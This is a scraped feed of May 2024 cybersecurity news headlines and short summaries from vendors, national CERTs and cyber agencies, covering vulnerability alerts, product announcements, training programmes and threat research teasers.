
https://claroty.com/team82/disclosure-dashboard/cve-2024-5242
Cato CTRL Threat Brief: CVE-2024-3661 – VPN Vulnerability (“TunnelVision”)
2024-05-23T09:31:44Z | 1716456704

Executive Summary On May 6th, 2024, researchers from the Leviathan Security Group published an article detailing a technique to bypass most VPN applications, assigned as CVE-2024-3661 with a High CVSS score of 7.6. Researchers have labeled this technique ‘decloaking’ as while the VPN tunnel remains connected, it allows attackers to trick many VPN clients into... The post Cato CTRL Threat Brief: CVE-2024-3661 – VPN Vulnerability (“TunnelVision”) appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-impact-and-analysis-of-cve-2024-3661-tunnelvision-vpn-vulnerability/
Security Alert (A24-05-19): Multiple Vulnerabilities in Cisco Products
2024-05-23T04:00:00Z | 1716436800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
The Total Economic Impact™ of Cato Networks
2024-05-22T13:30:37Z | 1716384637

The post The Total Economic Impact™ of Cato Networks appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks/
Have Web Trust Issues? Bot Management Can Help
2024-05-22T13:00:00Z | 1716382800

https://www.akamai.com/blog/security/2024/may/how-bot-management-can-help
Introducing SignSaboteur: forge signed web tokens with ease
2024-05-22T12:37:00Z | 1716381420

Signed web tokens are widely used for stateless authentication and authorization throughout the web. The most popular format is JSON Web Tokens (JWT) which we've already covered in depth, but beyond t

https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease
Tata Communications and Cisco Launch Webex Calling to Transform Cloud Communication in India
2024-05-22T12:00:00Z | 1716379200

Tata Communications and Cisco Launch Webex Calling to Transform Cloud Communication in IndiaMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m05/tata-communications-and-cisco-launch-webex-calling-to-transform-cloud-communication-in-india.html
The Most Common OT Security Threats & Risks and Their Solutions
2024-05-22T06:00:00Z | 1716357600

There is no question that cybersecurity is a top priority for operational technology (OT) managers across critical sectors like energy, manufacturing, and transportation. These systems control processes vital to society, making them highly attractive targets.

https://blog.scadafence.com/most-common-ot-security-threats-solutions
Security Alert (A24-05-17): Multiple Vulnerabilities in Google Chrome
2024-05-22T04:00:00Z | 1716350400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-05-18): Multiple Vulnerabilities in QNAP Products
2024-05-22T04:00:00Z | 1716350400

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Inscrições para o CyberSecurity Challenge PT 2024 já arrancaram
2024-05-22T00:00:00Z | 1716336000

Iniciaram as inscrições para a fase de qualificação do Cybersecurity Challenge PT (CSCPT), que se realiza a 1 de junho, que visa selecionar os 10 membros da TEAM Portugal, equipa de jovens talentos portugueses que vai representar o nosso país na 9.ª edição do European CyberSecurity Challenge 2024, considerada a maior competição europeia destinada a talentos de cibersegurança. Ao longo do mês de maio o Cybersecurity Challenge PT tem disponibilizado, na sua plataforma de treino, desafios, com vários níveis de dificuldade, destinados a jovens estudantes entre os 16 e os 25 anos, que visam capacitar todos os que pretendam inscrever-se para o Capture the Flag (CFT) de qualificação final, que vai decorrer, online, a 1 de junho. As inscrições para a final são feitas através do formulário de registo ou no site da competição.   A TEAM Portugal vai ser anunciada a 20 de junho na sessão de encerramento da 10.ª edição da conferência anual de cibersegurança - C-DAYS 2024, que este ano se realiza em Coimbra, no Convento de São Francisco. O Cybersecurity ChallengePT resulta de uma cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico, a Universidade do Porto e AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação. A iniciativa é apoiada pelo Centro Internet Segura (CIS).

https://dyn.cncs.gov.pt/pt/detalhe/art/135866/inscricoes-para-o-cybersecurity-challenge-pt-2024-ja-arrancaram
Why Game Companies Are Adopting Distributed Cloud Computing
2024-05-21T13:00:00Z | 1716296400

Global game developers are providing improved performance, better in-game experiences, and boosting gamer retention with distributed cloud computing.

https://www.akamai.com/blog/cloud/2024/may/game-companies-are-adopting-distributed-cloud-computing
CNCS formaliza assinatura do Compromisso C-Academy com Entidades Intermunicipais
2024-05-21T00:00:00Z | 1716249600

Foi formalizada a 17 de maio, nas instalações da Comunidade Intermunicipal do Alto Alentejo, a assinatura do Compromisso C-Academy entre o Centro Nacional de Cibersegurança (CNCS) e 14 Entidades Intermunicipais que passam a cooperar com a C-Academy - Formação Avançada em Cibersegurança, um projeto PRR que pretende abranger 9 800 formandos até ao primeiro trimestre de 2026. Associação de Municípios da Região Autónoma dos Açores Comunidade Intermunicipal do Baixo Alentejo Comunidade Intermunicipal Tâmega e Sousa Comunidade Intermunicipal Beiras e Serra da Estrela Comunidade Intermunicipal do Ave Comunidade Intermunicipal Médio Tejo Comunidade Intermunicipal Douro Comunidade Intermunicipal Terras de Trás-os-Montes Comunidade Intermunicipal Beira Baixa Comunidade Intermunicipal do Alto Alentejo Comunidade Intermunicipal Oeste Comunidade Intermunicipal do Alto Minho Comunidade Intermunicipal do Algarve Comunidade Intermunicipal Alentejo Central O envolvimento das Entidades Intermunicipais como parceiras do Compromisso C-Academy, aproveita o conhecimento que as mesmas têm quanto às necessidades da sua região, contribuindo para a promoção da formação em cibersegurança e resiliência cibernética de organizações e seu capital humano. Estas entidades a responsabilidade de assegurar a inscrição de formandos para, pelo menos, três turmas da C-Academy, para os vários níveis de formação. O Compromisso C-Academy insere-se na missão do projeto C-Academy, alinhado com o Regime Jurídico da Segurança do Ciberespaço, e tem como público-alvo todos os colaboradores das organizações que desejem adquirir conhecimentos especializados nas diversas áreas da cibersegurança, abrangendo todo o território nacional. Sobre a C-Academy A C-Academy é um programa de formação avançada em Cibersegurança para a administração pública e o setor privado desenvolvido pelo Centro Nacional de Cibersegurança, no âmbito do Plano de Recuperação e Resiliência. A oferta formativa da C-Academy é desenvolvida com base no Referencial de Competências e contempla formações, distribuídas pelos diferentes níveis de exigência e em formato online, presencial ou híbrido, abrangendo diversas áreas relevantes para panorama atual e futuro da Cibersegurança, tais como a engenharia, a gestão, o direito, entre outras. A formação da C-Academy é ministrada em colaboração com diversas Instituições de Ensino Superior o que permite, aos formandos que concluem a formação com sucesso, usufruir da acreditação da mesma, bem como dos ECTS que são reconhecidos, caso sejam prosseguidos os seus estudos académicos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135865/cncs-formaliza-assinatura-do-compromisso-c-academy-com-entidades-intermunicipais
Primeiros Centros de Competências da rede C-Network apresentados oficialmente
2024-05-21T00:00:00Z | 1716249600

O primeiro centro de competência da C-Network - Rede de Centros de Competências em Cibersegurança foi, oficialmente, apresentado numa sessão realizada no dia 6 de maio, na Universidade do Algarve. O Centro de Competência em Cibersegurança do Algarve (CCC Algarve), resulta de um consórcio que integra a Universidade do Algarve (AULg), a NERA – Associação Empresarial da Região do Algarve e a AMAL – Comunidade Intermunicipal do Algarve. O CCC Algarve é o primeiro centro a arrancar, dos 7 centros de competência que vão integrar a C-Network. Tem como missão, desenvolver e dinamizar a capacidade de resposta e resiliência às ameaças de cibersegurança na região, através do apoio às entidades públicas e privadas, na adoção de boas práticas nesta matéria. Hoje é feita a apresentação oficial do Centro de Competências em Cibersegurança do Alentejo, no âmbito de uma iniciativa que decorre no Instituto Politécnico de Beja, um dos membros do consórcio, que também integra o Instituto Politécnico de Portalegre e a Universidade de Évora. Os centros de competências vão ser distribuídos pelo país, um por cada região NUTII: Algarve Alentejo Lisboa e Vale do Tejo Centro Norte Região Autónoma dos Açores Região Autónoma da Madeira A C-Network é um projeto financiado pelo Plano de Recuperação e Resiliência (PRR), que pretende apoiar, aproximadamente, 2000 entidades até março de 2026, sendo dinamizado pelo Centro Nacional de Cibersegurança (CNCS). Fomentar um contacto mais próximo, consciente e adaptado a cada região, de acordo com as suas atividades, tecidos económicos e maturidades em cibersegurança distintas, é um dos objetivos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135864/primeiros-centros-de-competencias-da-rede-c-network-apresentados-oficialmente
Essential AI Vendor Evaluation: 9 Critical Questions You Must Ask by Jesse Kimbrel
2024-05-21T00:00:00Z | 1716249600

Make sure to ask your cybersecurity vendors the right questions to validate their claims about AI and help hold them accountable for the efficacy of their attack signal.

https://www.vectra.ai/blog/nine-questions-to-ask-your-ai-vendor-and-why
Cato CTRL Threat Research: Unmasking the Challenges of Blocking Malicious IP Addresses
2024-05-20T14:27:21Z | 1716215241

In the ever-evolving threat landscape, identifying and blocking malicious IP addresses is an essential defense mechanism. However, this task presents unique challenges that demand careful consideration and innovative approaches. Unlike domain names, the registration details for IP addresses are less transparent, making it more challenging to access ownership information, registration dates, and the responsible parties.... The post Cato CTRL Threat Research: Unmasking the Challenges of Blocking Malicious IP Addresses appeared first on Cato Networks.

https://www.catonetworks.com/blog/unmasking-the-challenges-of-blocking-malicious-ip-addresses-overcoming-the-unknown/
Why Insurers Need Visibility Into APIs Risks
2024-05-20T13:00:00Z | 1716210000

Learn the importance of API discovery, inventory, and risk assessment for insurance companies, and read two examples of why API security is a team sport.

https://www.akamai.com/blog/security/2024/sep/why-insurers-need-visibility-into-apis-risks
How to Defend Against Relentless DNS Attacks
2024-05-20T13:00:00Z | 1716210000

Enterprise organizations, their employees, and their customers are better protected from cyberattacks when their DNS is properly secured.

https://www.akamai.com/blog/security/battling-dns-fatigue-defend-against-relentless-attacks
Cyber weather for April 2024
2024-05-20T10:49:54Z | 1716202194

The start of spring was stormy in regards to cybersecurity. Signs of the storm in Cyber weather were especially the Warning 1/2024 published in April regarding the Palo Alton GlobalProtect products, and malware that spread in Android phones through scam messages.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2024
Cyber weather for April 2024
2024-05-20T10:49:54Z | 1716202194

The start of spring was stormy in regards to cybersecurity. Signs of the storm in Cyber weather were especially the Warning 1/2024 published in April regarding the Palo Alton GlobalProtect products, and malware that spread in Android phones through scam messages.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_04/2024
FIRST POST: Apr-Jun 2024
2024-05-20T00:00:00Z | 1716163200

Message from the Chair; Message from the Chair; FIRST Standards Committee; CTI Conference in Berlin; FIRST Newcomers & Membership Committee; On the Road to Fukuoka - See you soon!; FIRST as a Diana Initiative Community Partner; Growth Stack Media PR Updates; Special Interest Group Updates; FIRST Impressions Podcast; FIRST on Social Media

https://www.first.org/newsroom/post/202405
Akamai?s Perspective on May?s Patch Tuesday 2024
2024-05-17T14:00:00Z | 1715954400

https://www.akamai.com/blog/security-research/2024/may/akamai-perspective-patch-tuesday-may-2024
The National Cyber Security Centre Finland’s weekly review – 20/2024
2024-05-17T13:36:12Z | 1715952972

This week, we talk about how important it is for organisations to invest resources in information security, as demonstrated by the recent City of Helsinki data breach, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-202024
The National Cyber Security Centre Finland’s weekly review – 20/2024
2024-05-17T13:36:12Z | 1715952972

This week, we talk about how important it is for organisations to invest resources in information security, as demonstrated by the recent City of Helsinki data breach, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-202024
DDoS Attacks Against Life Sciences Organizations Likely to Rise
2024-05-17T13:00:00Z | 1715950800

https://www.akamai.com/blog/security-research/rising-ddos-attacks-against-life-sciences-organizations
High Threat Security Alert (A24-05-15): Multiple Vulnerabilities in Microsoft Edge
2024-05-17T04:00:00Z | 1715918400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-05-16): Multiple Vulnerabilities in Fortinet Products
2024-05-17T04:00:00Z | 1715918400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Understanding AddressSanitizer: Better memory safety for your code
2024-05-16T13:00:57Z | 1715864457

This post will guide you through using AddressSanitizer (ASan), a compiler plugin that helps developers detect memory issues in code that can lead to remote code execution attacks (such as WannaCry or this WebP implementation bug). ASan inserts checks around memory accesses during compile time, and crashes the program […]

https://blog.trailofbits.com/2024/05/16/understanding-addresssanitizer-better-memory-safety-for-your-code/
The 10 Best Vulnerability Scanners for Effective Web Security
2024-05-16T13:00:00Z | 1715864400

7 factors for choosing the best vulnerability scanner. Top options compared on features, pros, cons, & pricing. 5 things that make a great scanner

https://wpscan.com/blog/vulnerability-scanners/
RACI for SASE: Maximizing Collaboration and Project Efficiency
2024-05-16T09:14:09Z | 1715850849

The post RACI for SASE: Maximizing Collaboration and Project Efficiency appeared first on Cato Networks.

https://www.catonetworks.com/resources/raci-for-sase-maximizing-collaboration-and-project-efficiency/
High Threat Security Alert (A24-05-09): Multiple Vulnerabilities in Microsoft Products (May 2024)
2024-05-16T04:00:00Z | 1715832000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-05-10): Multiple Vulnerabilities in Google Chrome
2024-05-16T04:00:00Z | 1715832000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-05-11): Vulnerability in Microsoft Edge
2024-05-16T04:00:00Z | 1715832000

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-05-12): Multiple Vulnerabilities in Adobe Reader/Acrobat
2024-05-16T04:00:00Z | 1715832000

Patches are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-05-13): Multiple Vulnerabilities in Firefox
2024-05-16T04:00:00Z | 1715832000

Mozilla has published the advisories (MFSA2024-21 and MFSA2024-22) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-05-14): Multiple Vulnerabilities in Cisco Products
2024-05-16T04:00:00Z | 1715832000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Cisco Reports Third Quarter Earnings
2024-05-15T20:05:00Z | 1715803500

Cisco reported third quarter revenue of $12.7 billion, net income on a generally accepted accounting principles (GAAP) basis of $1.9 billion or $0.46 per share, and non-GAAP net income of $3.6 billion or $0.88 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m05/cisco-reports-third-quarter-earnings.html
The ROI of Doing Nothing
2024-05-15T12:49:49Z | 1715777389

The post The ROI of Doing Nothing appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-roi-of-doing-nothing/
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. május
2024-05-15T12:26:26Z | 1715775986

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt. A Microsoft 2024. május havi biztonsági csomagjában összesen 61 különböző biztonsági hibát javított, köztük 3 nulladik napi (zero-day) sebezhetőséget is, amelyek közül 2 esetében […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-majus/
NCSC ramps up support for those at high risk of cyber attacks ahead of election
2024-05-15T08:47:15Z | 1715762835

New Personal Internet Protection service provides an extra layer of security on personal devices for high-risk individuals.

https://www.ncsc.gov.uk/news/ncsc-support-those-high-risk-cyber-attacks-ahead-election
Cybersecurity Critical Features Checklist Discrete Manufacturing
2024-05-15T06:00:00Z | 1715752800

Cybersecurity: A Sector That Never Sleeps

https://blog.scadafence.com/cybersecurity-checklist-critical-features-discrete-manufacturing
Adobe Acrobat Reader Font gvar GlyphVariationData out-of-bounds read vulnerability
2024-05-15T00:00:00Z | 1715731200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1946
Adobe Acrobat Reader Font CPAL numColorRecords out-of-bounds read vulnerability
2024-05-15T00:00:00Z | 1715731200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1952
Honeypots Are Back: The Movie: The Blog
2024-05-15T00:00:00Z | 1715731200

In this post we examine the resurgence of honeypots, highlighting their importance as a critical defense against sophisticated attackers who have adapted to evade traditional threat intelligence methods.

https://www.greynoise.io/blog/honeypots-are-back-the-movie-the-blog
Data breaches - what are they?
2024-05-14T17:14:02Z | 1715706842

The City of Helsinki reported it was the target of a data breach at the start of May. Data breach means an unauthorised intrusion into an information system, service or device, or the unauthorised use of an application, such as an email account, with the credentials obtained. A data breach is a punishable offence as defined in the Criminal Code of Finland and an attempt to commit a data breach is also punishable. In this article, we will discuss data breaches in general.

https://www.kyberturvallisuuskeskus.fi/en/news/data-breaches-what-are-they
Data breaches - what are they?
2024-05-14T17:14:02Z | 1715706842

The City of Helsinki reported it was the target of a data breach at the start of May. Data breach means an unauthorised intrusion into an information system, service or device, or the unauthorised use of an application, such as an email account, with the credentials obtained. A data breach is a punishable offence as defined in the Criminal Code of Finland and an attempt to commit a data breach is also punishable. In this article, we will discuss data breaches in general.

https://www.kyberturvallisuuskeskus.fi/en/news/data-breaches-what-are-they
A peek into build provenance for Homebrew
2024-05-14T13:00:05Z | 1715691605

Last November, we announced our collaboration with Alpha-Omega and OpenSSF to add build provenance to Homebrew. Today, we are pleased to announce that the core of that work is live and in public beta: homebrew-core is now cryptographically attesting to all bottles built in the official Homebrew CI. You […]

https://blog.trailofbits.com/2024/05/14/a-peek-into-build-provenance-for-homebrew/
Why SaaS Companies Are Adopting Distributed Cloud Computing
2024-05-14T13:00:00Z | 1715691600

A study commissioned by Akamai included asking more than 250 global SaaS developers about their perceptions of distributed cloud. Their answers may surprise you.

https://www.akamai.com/blog/cloud/2024/may/saas-companies-adopting-distributed-cloud-computing
Vulnerability in Online Shopping System Advanced software
2024-05-14T11:00:00Z | 1715684400

Reflected XSS vulnerability (CVE-2024-3579) has been found in Online Shopping System Advanced open-source project.

https://cert.pl/en/posts/2024/05/CVE-2024-3579/
High Threat Security Alert (A24-05-07): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-05-14T04:00:00Z | 1715659200

Apple has released iOS 16.7.8, iOS 17.5, iPadOS 16.7.8 and iPadOS 17.5 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-05-08): Vulnerability in Google Chrome
2024-05-14T04:00:00Z | 1715659200

Google released a security update to address the vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
A persistent twist in the current Malware Campaign
2024-05-13T19:12:20Z | 1715627540

Recently while covering malware campaigns exploiting the LiteCache and WP‑Automatic WordPress plugins, we found that attackers were installing php‑everywhere, a plugin that allows users to run arbitrary PHP code in their site’s posts. This plugin was closed on April 25th per its author’s request. The reasoning behind this installation was to have persistent malware on the […]

https://wpscan.com/blog/a-persistent-twist-in-the-current-malware-campaign/
Cato’s Addie Finch Named to CRN’s Women of the Channel Power 100 List
2024-05-13T14:42:05Z | 1715611325

Since our founding in 2015, Cato Networks has been committed to being a partner-first company, where our channel partners, solution providers and resellers are at the forefront of our business strategy and growth. Our progress would not be possible without our channel ecosystem and, by extension, the guidance of Cato’s channel leaders. We are excited... The post Cato’s Addie Finch Named to CRN’s Women of the Channel Power 100 List appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-addie-finch-named-to-crns-women-of-the-channel-power-100-list/
Locked Shields 2024 demonstrated the real power of cooperative defence
2024-05-13T12:36:03Z | 1715603763

Locked Shields 2024, the world’s most advanced live-fire cyber defence exercise, concluded with an unprecedented twist. They demonstrated that the true power lies in fostering collaboration to enhance collective security rather than competing for the exercise’s victory.

https://cert.lv/en/2024/05/locked-shields-2024-demonstrated-the-real-power-of-cooperative-defence
Vulnerability in Ant Media Server software
2024-05-13T12:00:00Z | 1715601600

Authentication Bypass by Assumed-Immutable Data vulnerability (CVE-2024-3462) has been found in Ant Media Server (Community Edition) software.

https://cert.pl/en/posts/2024/05/CVE-2024-3462/
React faster to suspicious E-mails with Mail Monitor
2024-05-13T11:18:00Z | 1715599080

In today's threat landscape, companies employ various solutions to protect against phishing attacks. Ideally, phishing emails should get detected and blocked by those solutions and never reach an end user's inbox. But there are always new phishing campaigns which employ novel methods such as embedded HTML files and multi stage approaches. So, unfortunately, there will always be emails which make it past the protection. It is then the end user who is the last line of defense. Here is an example of a type of email which users currently often receive:Many end users will be unsure what to do with this kind of email. Ideally, they should know immediately how to report this email and find out if it is legit or yet another phishing email. So how can you make it easy for them to report those emails?This is where Joe Sandbox Mail Monitor comes into play. It provides you with a custom email address to which users can forward suspicious emails. The contents of the email will then be analyzed automatically by Joe Sandbox, providing a profound verdict and deep malware analysis reports. Your SOC will be instantly notified about these submissions, and receive further notifications on the detection as well as links to the analysis reports. Here is an example for such a notification, relating to the email above:Configuration optionsIn addition, Joe Sandbox lets you customize many aspects of the Mail Monitor feature, such as:Input filtering: Define file extensions and URLs which should not be analyzedNotification recipients: You can configure who should receive these notifications, including the user who forwarded the email.Notification events: Define for which events notifications shall be sent (e.g. only for malicious results)Email layout: You can add your own company's design to the emails.Screenshots: Analysis screenshots can be included in the notification emails as well.  Here is a screenshot of the full configuration panel:ReportsWhen receiving a new notification, SOC experts can follow the links in the notification to the Deep Malware Analysis reports and learn more about the details of the sample and its dynamic behavior, e.g.:Here is a very nice example for a report of a phishing email we analyzed recently:Example report (HTML Phisher)OverviewHere is a graphical overview of how it all works together:To summarize, Joe Sandbox Mail Monitor is a tool that enables your end users to easily report suspicious emails and submit them for automated analysis to Joe Sandbox. You can integrate Mail Monitor into your existing workflows and achieve faster detection of and reaction to novel threats, stopping phishing campaigns before they can wreak havoc.If you are already a Cloud Pro customer with a Windows or Ultimate account, you can directly try out Mail Monitor and explore all the options it offers.Would you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/6382570289213608279
Introducing the NCSC's ‘Share and Defend’ capability
2024-05-13T07:29:28Z | 1715585368

Join the community of service providers helping to protect the UK from cyber attacks.

https://www.ncsc.gov.uk/blog-post/introducing-share-defend-acd
High Threat Security Alert (A24-05-06): Multiple Vulnerabilities in Microsoft Edge
2024-05-13T04:00:00Z | 1715572800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
NIS 2 is coming. Are You Ready?
2024-05-12T09:14:52Z | 1715505292

The post NIS 2 is coming. Are You Ready? appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-nis2-is-coming-are-you-ready
Aprillikuu küberruumis: jätkusid küberründed ja esines tõrkeid eksamite infosüsteemiga
2024-05-10T10:42:42Z | 1715337762

Riigi Infosüsteemi Ameti (RIA) kuukokkuvõttest selgub, et mitmel korral esines tõrkeid nii eksamite infosüsteemiga kui ka digiallkirjastamisega ning toimus üleriigiline teenusekatkestus perearstide infosüsteemi töös.

https://ria.ee/uudised/aprillikuu-kuberruumis-jatkusid-kuberrunded-ja-esines-torkeid-eksamite-infosusteemiga
National Cyber Security Centre's weekly review – 19/2024
2024-05-10T10:00:00Z | 1715335200

This week, we removed the alert we published in April about a critical vulnerability in Palo Alto's products. We will also discuss the harms caused by the Mirai malware and the ways all consumers can take care of the security of their devices and network environment.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-192024
National Cyber Security Centre's weekly review – 19/2024
2024-05-10T10:00:00Z | 1715335200

This week, we removed the alert we published in April about a critical vulnerability in Palo Alto's products. We will also discuss the harms caused by the Mirai malware and the ways all consumers can take care of the security of their devices and network environment.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-192024
High Threat Security Alert (A24-05-05): Vulnerability in Google Chrome
2024-05-10T04:00:00Z | 1715313600

Google released a security update to address the vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Informação: mensagem de correio eletrónico enviada pela AIMA
2024-05-10T00:00:00Z | 1715299200

A AIMA – Agência para a Integração, Migrações e Asilo, I.P., procedeu ao envio de uma mensagem de correio eletrónico, com acesso a um link com instruções para efetuar o pagamento das taxas devidas, a todas as pessoas estrangeiras que aguardam agendamento de atendimento, com vista à emissão de uma autorização de residência. A AIMA confirma a autenticidade desta mensagem, sendo a mesma proveniente de um organismo público e emitida no contexto de um procedimento administrativo real, que visa simplificar a forma como as pessoas cumprem uma obrigação legal, e com recurso a meios digitais para um maior conforto do utente e celeridade no processamento dos pedidos. No entanto, e neste contexto, o Centro Nacional de Cibersegurança (CNCS) chama a atenção para a necessidade de assegurar boas práticas de ciber-higiene sempre que é recebida uma mensagem de email deste tipo, de modo a prevenir incidentes de cibersegurança. O destinatário deve tentar perceber se faz sentido esse pedido, e se o mesmo é efetuado pela entidade representada, nomeadamente: A mensagem foi enviada a partir de um endereço de email legítimo – no caso, manifestacao.interesse@aima.gov.pt; O link constante da mensagem recebida é de um domínio seguro – no caso, services.aima.gov.pt.

https://dyn.cncs.gov.pt/pt/detalhe/art/135862/informacao-mensagem-de-correio-eletronico-enviada-pela-aima
Cybersecurity Challenge.PT inicia a 13 de maio
2024-05-10T00:00:00Z | 1715299200

Vai arrancar, a 13 de maio, o Cybersecurity ChallengePT, uma iniciativa destinada aos jovens estudantes entre os 16 e os 25 anos, que tem como objetivo selecionar os 10 jovens talentos em Cibersegurança, que vão representar o nosso país na 9.ª edição do European Cybersecurity Challenge que decorre, este ano, em Itália. Ao longo do mês de maio vão ser lançados, na plataforma de treino, desafios de vários níveis de dificuldade que fazem parte da qualificação inserida na competição. A prova de seleção final, com um uma competição de Capture the Flag (CTF) de qualificação com a duração de 10 horas, vai decorrer no dia 1 de junho. O Cybersecurity ChallengePT resulta de uma cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico, a Universidade do Porto e AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação. A iniciativa é apoiada pelo Centro Internet Segura (CIS). A atividade, que todos os anos, conta com centenas de participantes, enquadra-se num programa de formação e treino abrangente, cujo objetivo passa por capacitar o país de recursos nas áreas de cibersegurança e segurança da informação, e com isto atrair, desde cedo, estudantes do ensino secundário e ensino superior. Como uma iniciativa inserida no eixo Educação do programa INCoDe.2030 e no plano de ação da Estratégia Nacional de Segurança do Ciberespaço, o Cybersecurity ChallengePT pretende dotar os mais jovens das competências digitais e promover a literacia digital, em todos os ciclos de ensino e de aprendizagem ao longo da vida. Visa, ainda, identificar jovens talentos nacionais e despertar-lhes o interesse por uma carreira profissional na área da Cibersegurança.

https://dyn.cncs.gov.pt/pt/detalhe/art/135861/cybersecurity-challengept-inicia-a-13-de-maio
Graylog Celebrates Triple Win at 2024 Cybersecurity Excellence Awards
2024-05-09T14:00:15Z | 1715263215

Graylog wins big at the 2024 Cybersecurity Excellence Awards, securing three gold awards for API Security, Central Log Management, and SIEM. Find out more about our award-winning solutions. The post Graylog Celebrates Triple Win at 2024 Cybersecurity Excellence Awards appeared first on Graylog.

https://graylog.org/news/graylog-celebrates-triple-win-at-2024-cybersecurity-excellence-awards/
SASE for Retail: Growing the Bottom Line
2024-05-09T13:34:31Z | 1715261671

Retail and hospitality businesses prioritize delivering exceptional customer service and growing revenue. Just as their mission relies on a service-oriented staff and quality products, it also requires secure and reliable connectivity. A high performing and secure network enables retailers to offer consistent and positive consumer interactions across online and physical stores around the world. This... The post SASE for Retail: Growing the Bottom Line appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-for-retail-growing-the-bottom-line/
Vulnerabilities in CemiPark software
2024-05-09T11:00:00Z | 1715252400

CERT Poland has received a report about 3 vulnerabilities (from CVE-2024-4423 to CVE-2024-4425) found in CemiPark software.

https://cert.pl/en/posts/2024/05/CVE-2024-4423/
Vulnerabilities in Kioware for Windows
2024-05-09T10:00:00Z | 1715248800

CERT Poland has received a report about 3 vulnerabilities (CVE-2024-3459, CVE-2024-3460 and CVE-2024-3461) found in Kioware for Windows software.

https://cert.pl/en/posts/2024/05/CVE-2024-3459/
Using benchmarks to speed up Echidna
2024-05-08T13:30:07Z | 1715175007

During my time as a Trail of Bits associate last summer, I worked on optimizing the performance of Echidna, Trail of Bits’ open-source smart contract fuzzer, written in Haskell. Through extensive use of profilers and other tools, I was able to pinpoint and debug a massive space leak in one of Echidna’s […]

https://blog.trailofbits.com/2024/05/08/using-benchmarks-to-speed-up-echidna/
Akamai Recognized as a Customers? Choice for Cloud WAAP for the 5th Year
2024-05-08T13:00:00Z | 1715173200

https://www.akamai.com/blog/security/2024/may/akamai-recognized-customers-choice-cloud-waap-5th-year
Risk Ratings Platforms Deliver Critical Third-Party Risk Protection
2024-05-08T11:39:55Z | 1715168395

RiskRecon by Mastercard and Forrester Consulting conducted a survey of 507 global professionals to assess the impact of risk ratings on third-party risk management (TPRM). Through evaluating responses to 11 statements related to TPRM practices, organizations were categorized as TPRM leaders, intermediates, or laggards based on their maturity level.

https://blog.riskrecon.com/resources/reports-and-whitepapers/risk-ratings-platforms-deliver-critical-third-party-risk-protection
The National Cyber Security Centre Finland’s weekly review – 18/2024
2024-05-08T11:37:06Z | 1715168226

This week, we talk about Android malware designed to give criminals access to victims’ bank accounts. As usual, the review also includes recently reported scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182024
The National Cyber Security Centre Finland’s weekly review – 18/2024
2024-05-08T11:37:06Z | 1715168226
